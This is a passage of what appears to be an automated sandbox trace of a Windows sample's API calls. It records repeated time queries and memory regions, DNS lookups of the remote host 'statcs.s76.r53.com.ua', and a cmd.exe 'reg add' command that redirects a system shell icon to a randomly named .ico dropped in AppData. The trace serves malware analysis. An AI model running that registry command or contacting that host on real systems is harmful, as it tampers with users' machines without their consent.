lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 
wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) 
[0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.460] 
FreeLibrary (hLibModule=0x76910000) returned 1 [0113.460] LocalFree (hMem=0x224450) returned 0x0 [0113.461] FreeLibrary (hLibModule=0x76910000) returned 1 [0113.461] LocalFree (hMem=0x224440) returned 0x0 [0113.461] ExitProcess (uExitCode=0x0) Thread: id = 74 os_tid = 0xd9c [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0112.926] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x191ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0112.927] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x191fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x191fbac | out: ppResult=0x191fbac*=0x0) returned 11001 [0113.033] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x191fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x191fbac | out: ppResult=0x191fbac*=0x0) returned 11001 [0113.033] getnameinfo (in: pSockaddr=0x191fc14, SockaddrLength=0x0, pNodeBuffer=0x134831c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0113.033] htons (hostshort=0x0) returned 0x0 [0113.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0113.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] SetEvent (hEvent=0x84) returned 1 [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] 
GetCurrentThreadId () returned 0xd9c [0113.034] CloseHandle (hObject=0xb8) returned 1 [0113.034] RtlExitUserThread (Status=0x0) Thread: id = 76 os_tid = 0xdc0 Process: id = "44" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7397 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7398 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7399 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7400 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7401 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe") Region: id = 7402 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7403 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7404 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7405 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7406 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7718 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7719 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7720 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7721 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7722 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 7723 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 7724 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7725 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7726 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7727 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7728 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7729 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7730 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7731 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7732 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 7733 start_va = 0x76490000 end_va = 0x764aefff 
entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7734 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7735 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 7736 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 7737 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7738 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7739 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7740 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 7741 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 7779 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 72 os_tid = 0xd90 [0114.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afce4 | out: lpSystemTimeAsFileTime=0x1afce4*(dwLowDateTime=0x81ddc340, dwHighDateTime=0x1d440a9)) [0114.875] GetCurrentProcessId () returned 0xd8c [0114.875] GetCurrentThreadId () 
returned 0xd90 [0114.875] GetTickCount () returned 0x27454 [0114.875] QueryPerformanceCounter (in: lpPerformanceCount=0x1afcdc | out: lpPerformanceCount=0x1afcdc*=17166417225) returned 1 [0114.876] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0114.876] __set_app_type (_Type=0x1) [0114.876] __p__fmode () returned 0x76b331f4 [0114.876] __p__commode () returned 0x76b331fc [0114.876] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0114.876] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0114.876] GetCurrentThreadId () returned 0xd90 [0114.876] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd90) returned 0x38 [0114.876] GetModuleHandleW 